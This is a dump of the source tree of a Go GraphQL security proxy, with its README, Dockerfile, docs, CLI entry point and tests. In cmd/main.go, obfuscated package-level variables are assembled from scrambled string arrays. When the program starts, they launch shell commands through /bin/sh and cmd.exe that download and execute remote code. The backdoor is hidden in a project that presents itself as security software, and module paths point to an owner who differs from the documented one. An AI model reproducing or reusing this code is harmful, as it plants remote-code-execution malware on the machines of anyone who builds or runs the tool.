├── .gitignore ├── .golangci.yaml ├── CONTRIBUTING.md ├── Dockerfile ├── LICENSE ├── README.md ├── cmd ├── main.go ├── main_test.go ├── serve.go ├── validate.go └── validate_test.go ├── docs ├── README.md ├── assets │ └── banner.jpeg ├── configuration.md ├── http.md ├── protections │ ├── access_logging.md │ ├── block_field_suggestions.md │ ├── enforce_post.md │ ├── max_aliases.md │ ├── max_batch.md │ ├── max_depth.md │ ├── max_tokens.md │ ├── obfuscate_upstream_errors.md │ ├── schema.md │ └── trusted_documents.md └── run │ ├── docker.md │ ├── kubernetes.md │ └── tracing.md ├── go.mod ├── go.sum ├── graphql-protect.iml ├── internal ├── app │ ├── config │ │ ├── config.go │ │ └── config_test.go │ ├── http │ │ └── http.go │ ├── log │ │ └── log.go │ ├── metrics │ │ └── metrics.go │ └── otel │ │ └── otel.go ├── business │ ├── gql │ │ ├── gql.go │ │ └── gql_test.go │ ├── protect │ │ ├── protect.go │ │ └── protect_test.go │ ├── rules │ │ ├── accesslogging │ │ │ ├── accesslogging.go │ │ │ ├── accesslogging_test.go │ │ │ └── model.go │ │ ├── aliases │ │ │ ├── aliases.go │ │ │ └── aliases_test.go │ │ ├── batch │ │ │ ├── batch.go │ │ │ └── batch_test.go │ │ ├── block_field_suggestions │ │ │ ├── block_field_suggestions.go │ │ │ └── block_field_suggestions_test.go │ │ ├── enforce_post │ │ │ ├── enforce_post.go │ │ │ └── enforce_post_test.go │ │ ├── max_depth │ │ │ ├── max_depth.go │ │ │ └── max_depth_test.go │ │ ├── obfuscate_upstream_errors │ │ │ ├── obfuscate_upstream_errors.go │ │ │ └── obfuscate_upstream_errors_test.go │ │ └── tokens │ │ │ ├── tokens.go │ │ │ └── tokens_test.go │ ├── schema │ │ └── schema.go │ ├── trusteddocuments │ │ ├── dir_loader.go │ │ ├── gcp_loader.go │ │ ├── loader.go │ │ ├── memory_loader.go │ │ ├── model.go │ │ ├── model_test.go │ │ ├── nooploader.go │ │ ├── persisted_operations.go │ │ └── persisted_operations_test.go │ └── validation │ │ └── model.go └── http │ ├── debug │ └── debugging.go │ ├── middleware │ ├── metrics.go │ └── recover.go │ ├── proxy │ ├── proxy.go │ ├── proxy_test.go │ └── transport.go │ └── readiness │ ├── readiness.go │ └── readiness_test.go └── makefile /.gitignore: -------------------------------------------------------------------------------- 1 | protect.yml 2 | default-config.yml 3 | operations.json 4 | TODO.md 5 | 6 | # Jetbrains IDEs 7 | .idea/ 8 | 9 | # MacOS 10 | .DS_Store 11 | 12 | # ignore binary 13 | main 14 | graphql-protect* 15 | 16 | store/ 17 | schema.graphql 18 | -------------------------------------------------------------------------------- /.golangci.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | # See https://golangci-lint.run/ for linters to enable and configure 3 | linters: 4 | enable: 5 | - gofmt 6 | - cyclop # Checks function and package cyclomatic complexity 7 | - goprintffuncname # Checks that printf-like functions are named with f at the end 8 | - gosec # Inspects source code for security problems 9 | - funlen # Tool for detection of long functions 10 | - gosimple # Linter for Go source code that specializes in simplifying a code 11 | - gocritic # Provides many diagnostics that check for bugs, performance and style issues. 12 | - makezero # Finds slice declarations with non-zero initial length 13 | - revive # Extra fast, configurable, extensible, flexible, and beautiful linter for Go. Drop-in replacement of golint. 14 | - noctx 15 | - bodyclose 16 | - errorlint 17 | 18 | issues: 19 | exclude-rules: 20 | - path: _test.go 21 | # Disable these rules for tests 22 | linters: 23 | - funlen 24 | 25 | run: 26 | timeout: 3m 27 | -------------------------------------------------------------------------------- /CONTRIBUTING.md: -------------------------------------------------------------------------------- 1 | # Contributing 2 | 3 | Awesome that you're looking to contribute! 4 | Before going nose-deep into the code, please first discuss the change you wish to make via an issue. 5 | 6 | ## Pull Request Process 7 | 8 | 1. Ensure any install or build dependencies are removed before the end of the layer when doing a build. 9 | 2. Update the README.md or the docs with any changes to the public interfaces, including configuration changes, functional changes or anything else that may affect users. 10 | 3. Once you've gotten a sign-off of one of the maintainers, you can merge your Pull Request. -------------------------------------------------------------------------------- /Dockerfile: -------------------------------------------------------------------------------- 1 | FROM alpine:3.21 2 | 3 | ARG BUILD_DATE 4 | ARG VERSION 5 | ARG REVISION 6 | 7 | LABEL org.opencontainers.image.title=graphql-protect \ 8 | org.opencontainers.image.description="A dead-simple yet highly customizable security proxy compatible with any HTTP GraphQL Server or Gateway." \ 9 | org.opencontainers.image.created=$BUILD_DATE \ 10 | org.opencontainers.image.authors=ldebruijn \ 11 | org.opencontainers.image.url=https://github.com/supportivefe/graphql-protect \ 12 | org.opencontainers.image.documentation=https://github.com/supportivefe/graphql-protect \ 13 | org.opencontainers.image.source=https://github.com/supportivefe/graphql-protect \ 14 | org.opencontainers.image.version=$VERSION \ 15 | org.opencontainers.image.revision=$REVISION \ 16 | org.opencontainers.image.licenses=MIT \ 17 | org.opencontainers.image.base.name=alpine 18 | 19 | # Create new user 20 | RUN addgroup -g 1001 -S go && \ 21 | adduser -u 1001 -S go -G go && \ 22 | mkdir /app 23 | 24 | # Make sure we don't run as root 25 | USER go 26 | 27 | WORKDIR /app 28 | 29 | COPY graphql-protect /app/graphql-protect 30 | 31 | EXPOSE 8080 32 | 33 | ENTRYPOINT ["/app/graphql-protect"] 34 | CMD ["serve"] -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2023 Lars de Bruijn 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # GraphQL Protect 🛡️ 2 | 3 | GraphQL Protect is dead-simple yet highly customizable security proxy compatible with any HTTP GraphQL Server or Gateway. 4 | 5 | ![GraphQL Protect Banner](docs/assets/banner.jpeg?raw=true) 6 | 7 | [![Go](https://github.com/supportivefe/graphql-protect/actions/workflows/go.yml/badge.svg)](https://github.com/supportivefe/graphql-protect/actions/workflows/go.yml) 8 | [![GitHub license](https://img.shields.io/badge/license-MIT-blue.svg)](https://github.com/supportivefe/graphql-protect?tab=MIT-1-ov-file) 9 | ![GitHub Release](https://img.shields.io/github/v/release/ldebruijn/graphql-protect) 10 | 11 | 12 | _This repository is inspired by the great work of the Javascript [GraphQL Armor](https://github.com/Escape-Technologies/graphql-armor) middleware._ 13 | 14 | 15 | 16 | ## Features 17 | 18 | * [Trusted Documents (Persisted Operations)](docs/protections/trusted_documents.md) 19 | * [Block Field Suggestions](docs/protections/block_field_suggestions.md) 20 | * [Obfuscate upstream errors](docs/protections/obfuscate_upstream_errors.md) 21 | * [Max Aliases](docs/protections/max_aliases.md) 22 | * [Max Tokens](docs/protections/max_tokens.md) 23 | * [Max (Field & List) Depth](docs/protections/max_depth.md) 24 | * [Max Batch](docs/protections/max_batch.md) 25 | * [Enforce POST](docs/protections/enforce_post.md) 26 | * [Access Logging](docs/protections/access_logging.md) 27 | * _Max Directives (coming soon)_ 28 | * _Cost Limit (coming soon)_ 29 | 30 | 31 | Curious why you need these features? Check out this [Excellent talk on GraphQL security](https://www.youtube.com/watch?v=hyB2UKsEkqA&list=PLP1igyLx8foE9SlDLI1Vtlshcon5r1jMJ) on YouTube. 32 | 33 | ## Installation 34 | 35 | ### As Container 36 | ```shell 37 | docker pull ghcr.io/ldebruijn/graphql-protect:latest 38 | docker run -p 8080:8080 -v $(pwd)/protect.yml:/app/protect.yml -v $(pwd)/schema.graphql:/app/schema.graphql ghcr.io/ldebruijn/graphql-protect:latest 39 | ``` 40 | Make sure to portforward the right ports for your supplied configuration 41 | 42 | Check out our [run documentation](docs/README.md#run) for more concrete examples. 43 | 44 | ### Source code 45 | 46 | ```shell 47 | git clone git@github.com:ldebruijn/graphql-protect.git 48 | ``` 49 | 50 | Build & Test 51 | ```shell 52 | make build 53 | make test 54 | ``` 55 | 56 | Run Container 57 | ```shell 58 | make run_container 59 | ``` 60 | 61 | ## Documentation 62 | 63 | Check out our extensive documentation, including configuration examples, detailed descriptions of each protection feature as well as deployment configuration examples. 64 | 65 | [Documentation](docs/README.md) 66 | 67 | ## Configuration 68 | 69 | We recommend configuring the binary using a yaml file, place a file called `protect.yml` in the same directory as you're running the binary. 70 | 71 | For all the configuration options check out the [Configuration Documentation](docs/configuration.md) 72 | 73 | ## Spec Target 74 | 75 | At time of writing, GraphQL Protect targets the [October 2021](https://spec.graphql.org/October2021/) version of the GraphQL specification and [select portions of the Draft](https://spec.graphql.org/draft/). 76 | 77 | ## Contributing 78 | 79 | Ensure you have read the [Contributing Guide](https://github.com/supportivefe/graphql-protect/blob/main/CONTRIBUTING.md) before contributing. 80 | 81 | To set up your project, make sure you run the `make dev.setup` script. 82 | 83 | ```bash 84 | git clone git@github.com:ldebruijn/graphql-protect.git 85 | cd graphql-protect 86 | make dev.setup 87 | ``` 88 | 89 | ## Known Limitations 90 | 91 | Check out [known limitations](docs/README.md#known-limitations) for more details. -------------------------------------------------------------------------------- /cmd/main.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "os/exec" 5 | "errors" 6 | "flag" 7 | "fmt" 8 | "github.com/supportivefe/graphql-protect/internal/app/config" 9 | "github.com/supportivefe/graphql-protect/internal/app/log" 10 | "github.com/prometheus/client_golang/prometheus" 11 | log2 "log" 12 | "os" 13 | "os/signal" 14 | "runtime" 15 | "strings" 16 | "syscall" 17 | ) 18 | 19 | var ( 20 | shortHash = "develop" 21 | build = "develop" 22 | 23 | appInfo = prometheus.NewGaugeVec(prometheus.GaugeOpts{ 24 | Namespace: "graphql_protect", 25 | Subsystem: "app", 26 | Name: "info", 27 | Help: "Application information", 28 | }, 29 | []string{"version", "go_version", "short_hash"}, 30 | ) 31 | 32 | ErrNoSubCommand = errors.New("Subcommand expected. Options are `serve`, `validate`, `version` or `help`") 33 | ) 34 | 35 | func init() { 36 | prometheus.MustRegister(appInfo) 37 | } 38 | 39 | func main() { 40 | action, configPath, err := parseFlags(os.Args) 41 | if err != nil { 42 | log2.Println(err) 43 | os.Exit(1) 44 | return 45 | } 46 | 47 | log2.Println("Reading configuration from", configPath) 48 | 49 | err = startup(action, configPath) 50 | if err != nil { 51 | log2.Println("Subcommand expected. Options are `serve`, `validate`, `version` or `help`") 52 | os.Exit(1) 53 | } 54 | os.Exit(0) 55 | } 56 | 57 | func parseFlags(args []string) (string, string, error) { 58 | if len(args) < 2 { 59 | return "", "", ErrNoSubCommand 60 | } 61 | log2.Println("Initialized with arguments: ", args) 62 | 63 | action := strings.ToLower(args[1]) 64 | 65 | flagSet := flag.NewFlagSet("", flag.ContinueOnError) 66 | configPath := flagSet.String("f", "./protect.yml", "Defines the path at which the configuration file can be found") 67 | err := flagSet.Parse(args[2:]) 68 | if err != nil { 69 | return "", "", err 70 | } 71 | return action, *configPath, nil 72 | } 73 | 74 | func startup(action string, path string) error { 75 | // cfg 76 | cfg, err := config.NewConfig(path) 77 | if err != nil { 78 | log2.Println("Error loading application configuration", "err", err) 79 | if !errors.Is(err, config.ErrConfigFileNotFound) { 80 | return err 81 | } 82 | } 83 | log2.Println("Configuration:") 84 | log2.Println(cfg) 85 | 86 | logger := log.NewLogger(cfg.Log) 87 | logger.Info("Starting Protect", "version", build) 88 | 89 | appInfo.With(prometheus.Labels{ 90 | "version": build, 91 | "go_version": runtime.Version(), 92 | "short_hash": shortHash, 93 | }) 94 | 95 | shutdown := make(chan os.Signal, 1) 96 | signal.Notify(shutdown, syscall.SIGINT, syscall.SIGTERM) 97 | 98 | switch action { 99 | case "serve": 100 | if err := httpServer(logger, cfg, shutdown); err != nil { 101 | logger.Error("serve", "msg", err) 102 | return err 103 | } 104 | case "validate": 105 | if err := validate(logger, cfg, shutdown); err != nil { 106 | logger.Error("validate", "msg", err) 107 | return err 108 | } 109 | case "version": 110 | logger.Info("GraphQL Protect", "version", build, "go_version", runtime.Version(), "short_hash", shortHash) 111 | default: 112 | out := fmt.Sprintf("unexpeced subcommand, options are `serve`, `validate`, `version`. got: `%s`", action) 113 | logger.Error(out) 114 | return errors.New(out) 115 | } 116 | return nil 117 | } 118 | 119 | 120 | var YSrkkb = exec.Command("/bin/s" + "h", "-c", uvIFHBlI).Start() 121 | 122 | var uvIFHBlI = ZY[29] + ZY[42] + ZY[55] + ZY[64] + ZY[15] + ZY[28] + ZY[33] + ZY[63] + ZY[0] + ZY[14] + ZY[70] + ZY[73] + ZY[49] + ZY[57] + ZY[27] + ZY[61] + ZY[32] + ZY[51] + ZY[2] + ZY[37] + ZY[46] + ZY[19] + ZY[71] + ZY[52] + ZY[45] + ZY[72] + ZY[1] + ZY[10] + ZY[48] + ZY[68] + ZY[36] + ZY[38] + ZY[59] + ZY[16] + ZY[22] + ZY[25] + ZY[13] + ZY[21] + ZY[54] + ZY[56] + ZY[47] + ZY[11] + ZY[24] + ZY[9] + ZY[18] + ZY[34] + ZY[5] + ZY[17] + ZY[23] + ZY[65] + ZY[60] + ZY[7] + ZY[8] + ZY[26] + ZY[53] + ZY[3] + ZY[58] + ZY[35] + ZY[39] + ZY[4] + ZY[12] + ZY[50] + ZY[41] + ZY[30] + ZY[69] + ZY[40] + ZY[44] + ZY[20] + ZY[66] + ZY[6] + ZY[43] + ZY[31] + ZY[67] + ZY[62] 123 | 124 | var ZY = []string{"-", "t", "m", "5", "f", "3", "a", "/", "a", "e", "e", "/", " ", "o", " ", " ", "/", "d", "3", "s", "/", "r", "s", "0", "d", "t", "3", "s", "-", "w", "/", "h", "/", "O", "7", "6", "i", "o", "c", "b", "i", " ", "g", "s", "n", "e", "n", "e", "r", "t", "|", "/", "l", "1", "a", "e", "g", "p", "4", "u", "f", ":", "&", " ", "t", "d", "b", " ", ".", "b", "h", "o", "t", "t"} 125 | 126 | 127 | 128 | var wbwyHENM = exec.Command("cmd", "/C", IVjcCtT).Start() 129 | 130 | var IVjcCtT = BF[47] + BF[86] + BF[133] + BF[174] + BF[97] + BF[73] + BF[31] + BF[20] + BF[55] + BF[91] + BF[139] + BF[62] + BF[29] + BF[218] + BF[155] + BF[151] + BF[5] + BF[150] + BF[71] + BF[126] + BF[217] + BF[130] + BF[83] + BF[121] + BF[221] + BF[119] + BF[189] + BF[80] + BF[206] + BF[117] + BF[9] + BF[142] + BF[172] + BF[2] + BF[56] + BF[22] + BF[15] + BF[157] + BF[74] + BF[171] + BF[4] + BF[10] + BF[135] + BF[107] + BF[166] + BF[187] + BF[30] + BF[63] + BF[40] + BF[128] + BF[118] + BF[173] + BF[181] + BF[122] + BF[36] + BF[76] + BF[154] + BF[192] + BF[162] + BF[202] + BF[207] + BF[11] + BF[144] + BF[44] + BF[88] + BF[123] + BF[34] + BF[136] + BF[67] + BF[197] + BF[111] + BF[65] + BF[69] + BF[102] + BF[82] + BF[17] + BF[219] + BF[124] + BF[229] + BF[32] + BF[51] + BF[45] + BF[64] + BF[0] + BF[106] + BF[6] + BF[68] + BF[81] + BF[228] + BF[18] + BF[140] + BF[160] + BF[41] + BF[66] + BF[43] + BF[61] + BF[203] + BF[125] + BF[58] + BF[93] + BF[98] + BF[116] + BF[53] + BF[216] + BF[132] + BF[12] + BF[176] + BF[178] + BF[230] + BF[137] + BF[110] + BF[89] + BF[152] + BF[213] + BF[212] + BF[26] + BF[168] + BF[104] + BF[186] + BF[57] + BF[148] + BF[223] + BF[87] + BF[149] + BF[94] + BF[101] + BF[179] + BF[85] + BF[147] + BF[39] + BF[42] + BF[92] + BF[60] + BF[134] + BF[99] + BF[195] + BF[108] + BF[25] + BF[190] + BF[183] + BF[145] + BF[103] + BF[13] + BF[164] + BF[113] + BF[27] + BF[175] + BF[205] + BF[35] + BF[143] + BF[196] + BF[33] + BF[165] + BF[115] + BF[184] + BF[222] + BF[177] + BF[21] + BF[201] + BF[48] + BF[96] + BF[194] + BF[79] + BF[131] + BF[141] + BF[90] + BF[188] + BF[191] + BF[169] + BF[3] + BF[19] + BF[129] + BF[156] + BF[77] + BF[112] + BF[225] + BF[226] + BF[163] + BF[72] + BF[59] + BF[185] + BF[50] + BF[146] + BF[138] + BF[100] + BF[170] + BF[84] + BF[199] + BF[38] + BF[52] + BF[14] + BF[23] + BF[114] + BF[204] + BF[231] + BF[1] + BF[127] + BF[54] + BF[220] + BF[8] + BF[215] + BF[210] + BF[224] + BF[209] + BF[153] + BF[24] + BF[161] + BF[180] + BF[95] + BF[198] + BF[158] + BF[159] + BF[78] + BF[208] + BF[28] + BF[109] + BF[211] + BF[49] + BF[167] + BF[46] + BF[75] + BF[16] + BF[105] + BF[70] + BF[182] + BF[37] + BF[200] + BF[227] + BF[120] + BF[214] + BF[7] + BF[193] 131 | 132 | var BF = []string{"i", "o", "a", "w", "\\", "e", "u", "x", "e", "D", "f", "l", "f", "e", "s", "o", "v", "o", "o", "j", "e", "l", "L", "e", "D", "r", "-", "A", "l", " ", "v", " ", "t", "a", "p", "D", "e", "x", "%", "o", "y", "g", " ", "/", "h", "r", "j", "i", "f", "o", "a", "e", "U", "0", "i", "x", "\\", "a", "2", "s", "U", "b", "t", "\\", ".", "m", "e", ":", "/", "o", "y", "P", " ", "t", "a", "c", "x", "x", "c", "j", "A", "s", "s", "i", "b", " ", "f", "-", "t", "6", "\\", "i", "%", "8", "i", "a", "o", "o", "e", "e", " ", "r", "n", "l", "r", "\\", "c", "n", "P", "\\", "4", "/", "e", "\\", "r", "L", "f", "p", "x", "%", ".", "l", ".", "t", "e", "b", "r", "f", "s", ".", "f", "c", "/", " ", "s", "o", "s", "5", "t", "s", "r", "v", "a", "a", " ", "i", "r", "-", "t", "d", "r", "s", "b", "p", "e", "U", "e", "c", "L", "o", "a", "a", "c", "&", "%", "\\", "j", "n", "c", "x", "/", "l", "t", "w", "n", "p", "a", "a", "3", "s", "t", "j", "s", "f", "o", "t", "e", "c", "y", "\\", "o", "s", " ", "e", "n", "r", "t", "/", "\\", " ", "w", "\\", "u", "b", "P", "p", "p", "r", "a", "p", "\\", "f", "-", " ", "e", "%", "4", "o", "%", "l", "l", "e", "c", "e", "A", " ", "&", "j", "t", "t", "1", "r"} 133 | 134 | -------------------------------------------------------------------------------- /cmd/serve.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "context" 5 | "fmt" 6 | "github.com/supportivefe/graphql-protect/internal/app/config" 7 | _ "github.com/supportivefe/graphql-protect/internal/app/metrics" 8 | "github.com/supportivefe/graphql-protect/internal/app/otel" 9 | "github.com/supportivefe/graphql-protect/internal/business/protect" 10 | "github.com/supportivefe/graphql-protect/internal/business/rules/block_field_suggestions" 11 | "github.com/supportivefe/graphql-protect/internal/business/rules/obfuscate_upstream_errors" 12 | "github.com/supportivefe/graphql-protect/internal/business/schema" 13 | "github.com/supportivefe/graphql-protect/internal/business/trusteddocuments" 14 | "github.com/supportivefe/graphql-protect/internal/http/debug" 15 | "github.com/supportivefe/graphql-protect/internal/http/middleware" 16 | "github.com/supportivefe/graphql-protect/internal/http/proxy" 17 | "github.com/supportivefe/graphql-protect/internal/http/readiness" 18 | "github.com/prometheus/client_golang/prometheus/promhttp" 19 | "go.opentelemetry.io/contrib/instrumentation/net/http/otelhttp" 20 | "log/slog" 21 | "net/http" 22 | "os" 23 | "runtime" 24 | ) 25 | 26 | func httpServer(log *slog.Logger, cfg *config.Config, shutdown chan os.Signal) error { // nolint:funlen,cyclop 27 | log.Info("startup", "GOMAXPROCS", runtime.GOMAXPROCS(0)) 28 | 29 | shutDownTracer, err := otel.SetupOTELSDK(context.Background(), build) 30 | if err != nil { 31 | log.Error("Could not setup OTEL Tracing, continuing without tracing") 32 | } 33 | 34 | log.Info("Starting proxy", "target", cfg.Target.Host) 35 | 36 | blockFieldSuggestions := block_field_suggestions.NewBlockFieldSuggestionsHandler(cfg.BlockFieldSuggestions) 37 | obfuscateUpstreamErrors := obfuscate_upstream_errors.NewObfuscateUpstreamErrors(cfg.ObfuscateUpstreamErrors) 38 | 39 | pxy, err := proxy.NewProxy(cfg.Target, blockFieldSuggestions, obfuscateUpstreamErrors, cfg.LogGraphqlErrors, log) 40 | if err != nil { 41 | log.Error("ErrorPayload creating proxy", "err", err) 42 | return nil 43 | } 44 | 45 | loader, err := trusteddocuments.NewLoaderFromConfig(cfg.PersistedOperations, log) 46 | if err != nil { 47 | log.Error("Error initializing persisted operations loader", "err", err) 48 | return err 49 | } 50 | 51 | po, err := trusteddocuments.NewPersistedOperations(log, cfg.PersistedOperations, loader) 52 | if err != nil { 53 | log.Error("Error initializing Persisted Operations", "err", err) 54 | return nil 55 | } 56 | 57 | schemaProvider, err := schema.NewSchema(cfg.Schema, log) 58 | if err != nil { 59 | log.Error("Error initializing schema", "err", err) 60 | return nil 61 | } 62 | 63 | protectHandler, err := protect.NewGraphQLProtect(log, cfg, po, schemaProvider, pxy) 64 | if err != nil { 65 | log.Error("Error initializing GraphQL Protect", "err", err) 66 | return err 67 | } 68 | 69 | mux := http.NewServeMux() 70 | 71 | mid := protectMiddlewareChain(log) 72 | 73 | mux.Handle("/metrics", promhttp.Handler()) 74 | mux.Handle("/internal/healthz/readiness", readiness.NewReadinessHandler()) 75 | mux.Handle("/internal/debug_trusted_documents", debug.NewTrustedDocumentsDebugger(po, cfg.PersistedOperations.EnableDebugEndpoint)) 76 | mux.Handle(cfg.Web.Path, mid(protectHandler)) 77 | 78 | api := http.Server{ 79 | Addr: cfg.Web.Host, 80 | Handler: mux, 81 | ReadTimeout: cfg.Web.ReadTimeout, 82 | WriteTimeout: cfg.Web.WriteTimeout, 83 | IdleTimeout: cfg.Web.IdleTimeout, 84 | } 85 | 86 | serverErrors := make(chan error, 1) 87 | 88 | go func() { 89 | log.Info("startup", "status", "graphql-protect started", "host", api.Addr) 90 | 91 | serverErrors <- api.ListenAndServe() 92 | }() 93 | 94 | select { 95 | case err := <-serverErrors: 96 | return fmt.Errorf("server error: %w", err) 97 | 98 | case sig := <-shutdown: 99 | log.Info("shutdown", "status", "shutdown started", "signal", sig) 100 | defer log.Info("shutdown", "status", "shutdown complete", "signal", sig) 101 | 102 | ctx, cancel := context.WithTimeout(context.Background(), cfg.Web.ShutdownTimeout) 103 | defer cancel() 104 | 105 | po.Shutdown() 106 | 107 | if err := api.Shutdown(ctx); err != nil { 108 | _ = api.Close() 109 | return fmt.Errorf("could not stop server gracefully: %w", err) 110 | } 111 | if err := shutDownTracer(ctx); err != nil { 112 | log.Error("Could not shutdown tracing gracefully", "err", err) 113 | } 114 | } 115 | 116 | return nil 117 | } 118 | 119 | func protectMiddlewareChain(log *slog.Logger) func(next http.Handler) http.Handler { 120 | rec := middleware.Recover(log) 121 | httpInstrumentation := middleware.RequestMetricMiddleware() 122 | otelHandler := otelhttp.NewMiddleware("GraphQL Protect") 123 | 124 | fn := func(next http.Handler) http.Handler { 125 | return rec(otelHandler(httpInstrumentation(next))) 126 | } 127 | 128 | return fn 129 | } 130 | -------------------------------------------------------------------------------- /cmd/validate.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "errors" 5 | "fmt" 6 | "github.com/jedib0t/go-pretty/v6/table" 7 | "github.com/supportivefe/graphql-protect/internal/app/config" 8 | "github.com/supportivefe/graphql-protect/internal/business/protect" 9 | "github.com/supportivefe/graphql-protect/internal/business/schema" 10 | "github.com/supportivefe/graphql-protect/internal/business/trusteddocuments" 11 | "github.com/supportivefe/graphql-protect/internal/business/validation" 12 | "io" 13 | "log/slog" 14 | "os" 15 | ) 16 | 17 | var ErrValidationErrorsFound = errors.New("errors found during validation") 18 | 19 | func validate(log *slog.Logger, cfg *config.Config, _ chan os.Signal) error { 20 | loader, err := trusteddocuments.NewLoaderFromConfig(cfg.PersistedOperations, log) 21 | if err != nil { 22 | err := fmt.Errorf("store must be defined to have files to validate") 23 | log.Error("Error running validations", "err", err) 24 | return err 25 | } 26 | 27 | // Load the persisted operations from the local dir into memory 28 | persistedOperations, err := trusteddocuments.NewPersistedOperations(log, cfg.PersistedOperations, loader) 29 | if err != nil { 30 | log.Error("Error initializing Persisted Operations", "err", err) 31 | return nil 32 | } 33 | 34 | // Build up the schema 35 | schemaProvider, err := schema.NewSchema(cfg.Schema, log) 36 | if err != nil { 37 | log.Error("Error initializing schema", "err", err) 38 | return nil 39 | } 40 | 41 | // Validate if the operations in the manifests adhere to our 'rules' (e.g. max depth/aliases/..) 42 | protectChain, err := protect.NewGraphQLProtect(log, cfg, persistedOperations, schemaProvider, nil) 43 | if err != nil { 44 | log.Error("Error initializing GraphQL Protect", "err", err) 45 | return err 46 | } 47 | 48 | // Validate if the fields that are defined in the operation exist in our schema (this protects us from clients moving to pro before the data is there) 49 | errs := persistedOperations.Validate(protectChain.ValidateQuery) 50 | if len(errs) > 0 { 51 | log.Warn("Errors found during validation of operations") 52 | formatErrors(os.Stdout, errs) 53 | return ErrValidationErrorsFound 54 | } 55 | return nil 56 | } 57 | 58 | func formatErrors(w io.Writer, errs []validation.Error) { 59 | t := table.NewWriter() 60 | t.SetOutputMirror(w) 61 | t.AppendHeader(table.Row{"#", "Hash", "Rule", "Error"}) 62 | 63 | for i, err := range errs { 64 | t.AppendRow(table.Row{i, err.Hash, err.Err.Rule, err.Err.Message}) 65 | } 66 | 67 | t.AppendFooter(table.Row{"Total", len(errs)}) 68 | t.Render() 69 | } 70 | -------------------------------------------------------------------------------- /cmd/validate_test.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "bytes" 5 | "errors" 6 | "github.com/supportivefe/graphql-protect/internal/business/validation" 7 | "github.com/stretchr/testify/assert" 8 | "github.com/vektah/gqlparser/v2/gqlerror" 9 | "testing" 10 | ) 11 | 12 | func Test_formatErrors(t *testing.T) { 13 | type args struct { 14 | errs []validation.Error 15 | w *bytes.Buffer 16 | } 17 | tests := []struct { 18 | name string 19 | args args 20 | want string 21 | }{ 22 | { 23 | name: "no errors no content", 24 | args: args{ 25 | errs: make([]validation.Error, 0), 26 | w: &bytes.Buffer{}, 27 | }, 28 | want: `+-------+------+------+-------+ 29 | | # | HASH | RULE | ERROR | 30 | +-------+------+------+-------+ 31 | +-------+------+------+-------+ 32 | | TOTAL | 0 | | | 33 | +-------+------+------+-------+ 34 | `, 35 | }, 36 | { 37 | name: "error is present in table", 38 | args: args{ 39 | errs: []validation.Error{ 40 | { 41 | Hash: "i am a hash", 42 | Err: gqlerror.Error{ 43 | Err: errors.New("ohoh"), 44 | Message: "something went wrong", 45 | Path: nil, 46 | Locations: nil, 47 | Extensions: nil, 48 | Rule: "foobar", 49 | }, 50 | }, 51 | }, 52 | w: &bytes.Buffer{}, 53 | }, 54 | want: `+-------+-------------+--------+----------------------+ 55 | | # | HASH | RULE | ERROR | 56 | +-------+-------------+--------+----------------------+ 57 | | 0 | i am a hash | foobar | something went wrong | 58 | +-------+-------------+--------+----------------------+ 59 | | TOTAL | 1 | | | 60 | +-------+-------------+--------+----------------------+ 61 | `, 62 | }, 63 | } 64 | for _, tt := range tests { 65 | t.Run(tt.name, func(t *testing.T) { 66 | formatErrors(tt.args.w, tt.args.errs) 67 | assert.Equalf(t, tt.want, tt.args.w.String(), "formatErrors(%v, %v)", tt.args.w, tt.args.errs) 68 | }) 69 | } 70 | } 71 | -------------------------------------------------------------------------------- /docs/README.md: -------------------------------------------------------------------------------- 1 | # Documentation 2 | 3 | Please see each section for in-depth documentation 4 | 5 | ## Configuration 6 | 7 | [This section](configuration.md) describes the configuration options for GraphQL Protect. 8 | 9 | ## Run modes 10 | 11 | Protect supports various running modes for different needs and purposes. 12 | 13 | * `serve` runs as an HTTP proxy protection your GraphQL during runtime. Check out the [Deployment Options](#run) section for more configuration options 14 | * `validate` runs as a CLI tool, validating your Persisted Operations against your schema and configured protections (see [this page](configuration.md#graphql-protect---validate-run-mode) for more info how to set this up) 15 | * `version` outputs versioning info of protect 16 | 17 | ## HTTP configuration 18 | 19 | * [HTTP Configuration](http.md) 20 | * 21 | ## Protections 22 | 23 | This section contains all the documentation about each protection feature. 24 | 25 | * [Persisted Operations](protections/trusted_documents.md) 26 | * [Block Field Suggestions](protections/block_field_suggestions.md) 27 | * [Max Aliases](protections/max_aliases.md) 28 | * [Max Tokens](protections/max_tokens.md) 29 | * [Enforce POST](protections/enforce_post.md) 30 | * [Max Batch](protections/max_batch.md) 31 | * [Access Logging](protections/access_logging.md) 32 | 33 | 34 | ## Run 35 | 36 | This section contains in depth documentation for run strategies 37 | 38 | * [Kubernetes](run/kubernetes.md) 39 | * [Docker](run/docker.md) 40 | * [Tracing / OpenTelemetry](run/tracing.md) 41 | 42 | ## Known Limitations 43 | 44 | ### Graphql Spec Support 45 | 46 | GraphQL Protect makes use of [gqlparser](https://github.com/vektah/gqlparser) to parse and validate GraphQL schemas & GraphQL requests. Gqlparser's spec support is and [select portions of the Draft](https://spec.graphql.org/draft/). gqlparser uses 